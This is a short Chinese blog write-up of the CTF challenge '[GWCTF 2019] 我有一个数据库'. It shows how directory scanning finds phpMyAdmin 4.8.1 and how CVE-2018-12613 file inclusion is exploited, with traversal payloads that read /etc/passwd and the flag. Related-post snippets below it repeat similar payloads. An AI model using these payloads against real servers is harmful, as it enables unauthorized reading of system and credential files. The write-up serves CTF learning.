[GWCTF 2019]我有一个数据库1

最新推荐文章于 2023-01-29 00:09:53 发布
最新推荐文章于 2023-01-29 00:09:53 发布
阅读量466 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63169208/article/details/125467425
版权

安全 web安全

进来是一堆乱码,查看源码,抓包都没发现什么,这个时候就只能用dirsearch

去扫一下了

可以看到有个/phpmyadmin界面访问一下

得到这样一个界面,关注的点应该在下面这个,一般这种都是查一下版本漏洞

这个是存在这样一个漏洞的phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

接下来执行一下漏洞复现

payload:phpmyadmin/?target=db_sql.php%253f/../../../../../../../../etc/passwd

执行成功,既然/etc/passwd可以被读取成功,就直接尝试一下读取flag

payload:phpmyadmin/?target=db_sql.php%253f/../../../../../../../../flag

拿到

(第一次写,纯纯记录一下)

Y0n3er
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUU刷题--[GWCTF 2019]我有一个数据库
weixin_48631429的博客
12-02 573
我有一个数据库 打开看到这样一堆文字,读不懂,也没有其他的信息。 怎么想也想不到该怎么做,buu还不能扫描。所以只能看了wp,看到有一个/phpmyadmin,回来开始想怎么做 phpmyadmin版本信息4.8.1,搜索一下有什么漏洞。 任意文件包含:那么我们就可以利用来读flag ?target=db_datadict.php%253f/../../../../../../../../../flag 拿到flag 考点就是CVE-2018-12613 ...
[GWCTF 2019]我有一个数据库 1
qq_43618536的博客
07-21 718
[GWCTF 2019]我有一个数据库 1
DES加密、DES解密、AES加密、AES解密
06-26
个人例子,VS2013,DES加密、DES解密,AES加密,AES解密,
el函数的使用文档
07-09
例如,如上所述的`ELFunction`类,其中定义了一个名为`toUpper`的静态方法,用于将字符串转换为大写。 ```java package el; public class ELFunction { public static String toUpper(String str) { return str....
[GWCTF 2019]我有一个数据库
pakho_C的博客
02-26 2882
web第38题 [GWCTF 2019]我有一个数据库 打开靶场 提示有数据库,可能存在phpmyadmin类似的数据库管理工具页面,使用dirmap进行目录扫描 结合提示,有phpinfo.php和phpmyadmin目录 访问phpmyadmin 版本:4.8.1,存在文件包含漏洞 漏洞原理参考CVE-2018-12613phpmyadmin(文件包含)漏洞复现 这位师傅也讲得很好 BUUCTF_Web_[GWCTF 2019]我有一个数据库 直接构造payload: ?target=db_dat
web buuctf [GWCTF 2019]我有一个数据库1
weixin_44214568的博客
03-26 3471
1.直接放弃御剑了,在buu上扫不到,我自己登录先看了一下有没有robots.txt,有,但是没有扫到,我用了disearch,设置了s之后可以扫到了 py dirsearch -u url -e * -s 1 扫描出来
[GWCTF 2019] web题-我有一个数据库
BROTHERYY的博客
07-30 1785
复现环境:buuoj.cn 我是从题目猜到有phpmyadmin,直接就输入就进去了 看一下版本信息 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 能够执行,修改为flag flag{15aa1a13-8298-433c-8139-4ff6a0ffb5d6} ...
BUUCTF[GWCTF 2019]我有一个数据库
LSYZWF的博客
10-12 1761
文章目录题目解答漏洞分析知识点 题目 链接:https://buuoj.cn/challenges#[GWCTF%202019]%E6%88%91%E6%9C%89%E4%B8%80%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93 解答 1、乱码,看不懂 2、F12 同时结合题目可能与数据库有关 3、可以尝试扫描相关数据库的端口是否开放,也可以通过数据库工具进行连接测试,但是这里使用的是phpmyadmin 随便翻阅了一下,得不到有用的东西,也证实了上面什么都没有的说法 4、从
BUU [GWCTF 2019]我有一个数据库
cadandme的博客
05-11 217
刷了一道web题,记录做题过程。 打开页面看到 打开源码,尝试解码。试了UTF-8,尝试把得到的数据导成文档。 结果是乱码,走入了死胡同。数据库数据库,又想到扫描目录,在kali扫描,发现东西 先看txt, 再看phpinfo.php 到这里彻底不懂了,瞎搞了没看出东西后,看了大佬的wp,说是phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) 后面跟着wp来,可惜在构造Pyaload使用时显示 index.php?target=db_sql.php%253f/
BUU[GWCTF 2019]我有一个数据库
qq_62078839的博客
04-26 1834
打开链接 一堆乱码,查看源代码也没什么信息可提取,利用目录扫描器,看能不能扫出什么东西 扫到了一个phpmyadmin 进去看看 这里的版本号为4.8.1,而phpmyadmin在4.8.0以及4.8.1的版本号中有文件包含漏洞 [PHPMYADMIN]CVE-2018-12613 我们试试读取看是否成功 index.php?target=sql.php?/../../../../../../../../../etc/passwd 成功 尝试读取flag inde...
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
记录学习,一起进步
01-29 349
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
[GWCTF 2019]枯燥的抽奖 1
最新发布
08-26
根据提供的源代码和引用的内容来看,[GWCTF 2019]枯燥的抽奖 1是一道PHP伪随机数的题目。该题目中使用了mt_rand()函数生成伪随机数,并通过种子来控制生成的序列。通过审计代码,我们可以看到check.php是存在的,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值